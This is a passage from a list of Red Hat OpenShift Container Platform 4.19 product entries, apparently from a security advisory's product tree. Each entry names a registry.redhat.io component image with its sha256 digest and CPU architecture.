"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
